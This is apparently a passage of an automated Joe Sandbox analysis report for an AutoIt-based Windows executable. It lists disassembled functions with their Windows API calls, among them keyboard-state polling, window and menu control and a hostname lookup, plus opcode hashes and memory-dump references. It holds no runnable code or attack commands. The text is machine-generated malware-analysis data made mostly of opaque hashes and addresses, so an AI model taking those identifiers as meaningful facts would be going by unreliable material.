                                                                    • Opcode Fuzzy Hash: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
                                                                    • Instruction Fuzzy Hash: 4C41573110424A8BCF81FE18DD61AFF37A0BF41304F144445FCD51B6AADB399919DBA0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0100E2A0,00000010,?,Bad directive syntax error,0105F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0102F7C2
                                                                    • LoadStringW.USER32(00000000,?,0100E2A0,00000010), ref: 0102F7C9
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • _wprintf.LIBCMT ref: 0102F7FC
                                                                    • __swprintf.LIBCMT ref: 0102F81E
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0102F88D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1506413516-4153970271
                                                                    • Opcode ID: 44198db8d94a228524dfb96357e83a4cb201430dfbf90f3537d00b8fdc1c9e28
                                                                    • Instruction ID: 22f3fb48bbb1a6fbeff84e89e9242f7f884703432c658d0f3686fc2047044c23
                                                                    • Opcode Fuzzy Hash: 44198db8d94a228524dfb96357e83a4cb201430dfbf90f3537d00b8fdc1c9e28
                                                                    • Instruction Fuzzy Hash: AA21713190421EAFCF11FF90CC0AEFE7779BF18300F04445AF5456A161EA7A9618EB51
                                                                    APIs
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                      • Part of subcall function 00FD7924: _memmove.LIBCMT ref: 00FD79AD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01035330
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01035346
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01035357
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01035369
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0103537A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2279737902-1007645807
                                                                    • Opcode ID: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
                                                                    • Instruction ID: dacbe4d19e2c8f5880f464fab00a709846778a49ae8cec7dbbff321399b2c5fd
                                                                    • Opcode Fuzzy Hash: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
                                                                    • Instruction Fuzzy Hash: 42110471A9422979D760B676CC4ADFF7BBCFFD5B00F84445BB481AA1A1EAA04804C5A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 208665112-3771769585
                                                                    • Opcode ID: 2355cbc6edc4a20d84f511cb216886c1b4c1b483c56fd3c5db9975b378e940d8
                                                                    • Instruction ID: 736d98169a21622e06da57a78217aabaf552eda9ae5e076a2a73c956ca164dab
                                                                    • Opcode Fuzzy Hash: 2355cbc6edc4a20d84f511cb216886c1b4c1b483c56fd3c5db9975b378e940d8
                                                                    • Instruction Fuzzy Hash: A61105315002196BDB61AA349C4AEFF7BBCEF42311F0001AAF5C5DA061EF798981C750
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 01034F7A
                                                                      • Part of subcall function 00FF049F: timeGetTime.WINMM(?,75A8B400,00FE0E7B), ref: 00FF04A3
                                                                    • Sleep.KERNEL32(0000000A), ref: 01034FA6
                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01034FCA
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01034FEC
                                                                    • SetActiveWindow.USER32 ref: 0103500B
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01035019
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 01035038
                                                                    • Sleep.KERNEL32(000000FA), ref: 01035043
                                                                    • IsWindow.USER32 ref: 0103504F
                                                                    • EndDialog.USER32(00000000), ref: 01035060
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
• Instruction ID: f987fb31edc589b5390cdd2edb2885bf9076feffcc8416eb68b22318887fabcb
• Opcode Fuzzy Hash: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
• Instruction Fuzzy Hash: 47215070204206AFE7315F35EC98B2B7BADFB8B745F091014F2C5861A9DB6F8D509761
APIs
  • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
  • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
• CoInitialize.OLE32(00000000), ref: 0103D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0103D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0103D691
• CoCreateInstance.OLE32(01062D7C,00000000,00000001,01088C1C,?), ref: 0103D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0103D74C
• CoTaskMemFree.OLE32(?,?), ref: 0103D7A4
• _memset.LIBCMT ref: 0103D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0103D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0103D840
• CoTaskMemFree.OLE32(00000000), ref: 0103D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0103D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0103D880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 559f20fe0a9fcfa3f2f81dc7110d1151cde6f455d764e97a336466ac80f58fe5
• Instruction ID: 5a7eb7bf748676967966bd5e051c0a5e3eff2ea08d14a28ec2ce63dc201981a9
• Opcode Fuzzy Hash: 559f20fe0a9fcfa3f2f81dc7110d1151cde6f455d764e97a336466ac80f58fe5
• Instruction Fuzzy Hash: 1CB11B75A00209AFDB04DFA4C888DAEBBF9FF88314F148499E949EB251DB35ED41DB50
APIs
• GetDlgItem.USER32(?,00000001), ref: 0102C283
• GetWindowRect.USER32(00000000,?), ref: 0102C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0102C2F3
• GetDlgItem.USER32(?,00000002), ref: 0102C2FE
• GetWindowRect.USER32(00000000,?), ref: 0102C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0102C364
• GetDlgItem.USER32(?,000003E9), ref: 0102C372
• GetWindowRect.USER32(00000000,?), ref: 0102C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0102C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0102C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0102C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0102C3FE
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
• Instruction ID: 17953bcb2d62aadc9fef68bd371ee5faca215f324c6bd3dc989590b9704cb3d3
• Opcode Fuzzy Hash: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
• Instruction Fuzzy Hash: 2D516171B00205ABDB18CFADDD89A6EBBB9EB88310F14856DF515D7294DB7599008B10
APIs
  • Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FD20D3
• KillTimer.USER32(-00000001,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 00FD216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0100BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BD0A
• DeleteObject.GDI32(00000000), ref: 0100BD1C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
• Instruction ID: 595f3bf3343769f62b45bb3d48b5de712d32114cc4c6f1523b7efae26d0d3271
• Opcode Fuzzy Hash: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
• Instruction Fuzzy Hash: 1C61E135504701DFDB76AF19D858B2AB7F2FF50312F18841BE1C25B6A4C77AA881EB81
APIs
  • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
• GetSysColor.USER32(0000000F), ref: 00FD21D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
• Instruction ID: d0617f74fdceb1b888ef93cdac3476a90697b76be749442de5f6437b60172118
• Opcode Fuzzy Hash: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
• Instruction Fuzzy Hash: 7B41BC354042409FEF665F28DC48BB93B66EB16332F184356FEA58B2D5C7368C41EB61
APIs
• CharLowerBuffW.USER32(?,?,0105F910), ref: 0103A90B
• GetDriveTypeW.KERNEL32(00000061,010889A0,00000061), ref: 0103A9D5
• _wcscpy.LIBCMT ref: 0103A9FF
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 426f97a7d1b518d44519360239b437dfda0ae7e6a171f97f39ba97df6936c768
• Instruction ID: cfe52b22864e2ef5afb0056c1f81ac7d3ce7eaf94f0a1f6b204f9f7549db78c4
• Opcode Fuzzy Hash: 426f97a7d1b518d44519360239b437dfda0ae7e6a171f97f39ba97df6936c768
• Instruction Fuzzy Hash: 56519C352183019BC300EF14CD92AAFB7EAFF84740F48485EF5D5AB2A2DB759909CA52
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: 0b46355cd21638cffd674bf603ce6806011aade6fcfea83b45930d5bdcd3bf00
• Instruction ID: 6cc1b7422c8d38d06c675051e1fcd8c9dbb18da2bf4d3ae414687b5082378cf2
• Opcode Fuzzy Hash: 0b46355cd21638cffd674bf603ce6806011aade6fcfea83b45930d5bdcd3bf00
• Instruction Fuzzy Hash: 4B41297150420A9FEB25DF78DC42E7A77E9EF05700F2444AFE689CB392EA769901B710
APIs
• _memset.LIBCMT ref: 0105716A
• CreateMenu.USER32 ref: 01057185
• SetMenu.USER32(?,00000000), ref: 01057194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057221
• IsMenu.USER32(?), ref: 01057237
• CreatePopupMenu.USER32 ref: 01057241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0105726E
• DrawMenuBar.USER32 ref: 01057276
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
• Instruction ID: 76a394c2a260d7a13ae01b9f43292ea24f4f66ffd94359b021874a8b77c11846
• Opcode Fuzzy Hash: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
• Instruction Fuzzy Hash: DA414574A01209AFDB61DF68D884E9ABBF5FF08350F144069FE85A7351D736A910DB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0105755E
• CreateCompatibleDC.GDI32(00000000), ref: 01057565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01057578
• SelectObject.GDI32(00000000,00000000), ref: 01057580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0105758B
• DeleteDC.GDI32(00000000), ref: 01057594
• GetWindowLongW.USER32(?,000000EC), ref: 0105759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010575B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010575BE
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
• Instruction ID: ee28f2efc9fbf0bbea967d4dc6b39402e49a043815530130ca62777c450ad628
• Opcode Fuzzy Hash: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
• Instruction Fuzzy Hash: E4315A72101216ABDF629F68DC08FDB3BA9FF09364F110215FA9596190CB7AD811DBA4
APIs
• _memset.LIBCMT ref: 00FF6E3E
  • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
• __gmtime64_s.LIBCMT ref: 00FF6ED7
• __gmtime64_s.LIBCMT ref: 00FF6F0D
• __gmtime64_s.LIBCMT ref: 00FF6F2A
• __allrem.LIBCMT ref: 00FF6F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6F9C
• __allrem.LIBCMT ref: 00FF6FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6FD1
• __allrem.LIBCMT ref: 00FF6FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF7006
• __invoke_watson.LIBCMT ref: 00FF7077
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction ID: 66bae7601b4116fa0d7b1a8eb6a80517846498271fbce7dddb163498c1469da8
                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction Fuzzy Hash: 2E711876E0071BABE715AF68DC41BBAB7A8AF14734F14422AE614E72D0EF70DD409790
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032542
                                                                    • GetMenuItemInfoW.USER32(01095890,000000FF,00000000,00000030), ref: 010325A3
                                                                    • SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 010325D9
                                                                    • Sleep.KERNEL32(000001F4), ref: 010325EB
                                                                    • GetMenuItemCount.USER32(?), ref: 0103262F
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0103264B
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 01032675
                                                                    • GetMenuItemID.USER32(?,?), ref: 010326BA
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01032700
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032714
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
                                                                    • Instruction ID: abb67981537220ccea233c10ff1bd384a52c7388e78f7cb33a6a61911ff1c0d4
                                                                    • Opcode Fuzzy Hash: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
                                                                    • Instruction Fuzzy Hash: 8A61817490024AAFDB22DF68D988DBF7BBCFF85304F140499E9C2A7251D736A905DB21
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01056FA5
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01056FA8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01056FCC
                                                                    • _memset.LIBCMT ref: 01056FDD
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01056FEF
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01057067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
                                                                    • Instruction ID: c0736cda12637e23ac1e64482e08798dc9ec1dd24855a43fed18894ac1352da3
                                                                    • Opcode Fuzzy Hash: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
                                                                    • Instruction Fuzzy Hash: DC618E75900208AFDB11DFA8CC80EEF77F9EF09710F50019AFA54AB291C775A941DBA0
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01026BBF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 01026C18
                                                                    • VariantInit.OLEAUT32(?), ref: 01026C2A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 01026C4A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 01026C9D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 01026CB1
                                                                    • VariantClear.OLEAUT32(?), ref: 01026CC6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 01026CD3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CDC
                                                                    • VariantClear.OLEAUT32(?), ref: 01026CEE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
                                                                    • Instruction ID: 1fb1d93079246cf2e21e666322980c226a287e396860f0089e8d2cf37520a684
                                                                    • Opcode Fuzzy Hash: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
                                                                    • Instruction Fuzzy Hash: D8413175D0021E9FCF10EFA8D8449EEBFB9EF08354F108069E995A7251CB3AA945CF90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0102FD31
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0102FDB2
                                                                    • GetKeyState.USER32(000000A0), ref: 0102FDCD
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0102FDE7
                                                                    • GetKeyState.USER32(000000A1), ref: 0102FDFC
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 0102FE14
                                                                    • GetKeyState.USER32(00000011), ref: 0102FE26
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0102FE3E
                                                                    • GetKeyState.USER32(00000012), ref: 0102FE50
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0102FE68
                                                                    • GetKeyState.USER32(0000005B), ref: 0102FE7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
                                                                    • Instruction ID: 3b301d789f7501dfad777633abdc260569f8fb0af1264303efe75245dbbf0833
                                                                    • Opcode Fuzzy Hash: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
                                                                    • Instruction Fuzzy Hash: C741D6745047DB69FFB3AA6884043B6BEF16F01784F0840D9D6D6871C3EBE995C887A2
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • CoInitialize.OLE32 ref: 01048403
                                                                    • CoUninitialize.OLE32 ref: 0104840E
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,01062BEC,?), ref: 0104846E
                                                                    • IIDFromString.OLE32(?,?), ref: 010484E1
                                                                    • VariantInit.OLEAUT32(?), ref: 0104857B
                                                                    • VariantClear.OLEAUT32(?), ref: 010485DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 082c87d2e18a04e7e37ebe10cef5de5c668414f10d04c97c62e40e8a619ee658
                                                                    • Instruction ID: 611462534cd02ac8a709d807e74979c6e3f74b39b8b96a02506d4e3ff52da265
                                                                    • Opcode Fuzzy Hash: 082c87d2e18a04e7e37ebe10cef5de5c668414f10d04c97c62e40e8a619ee658
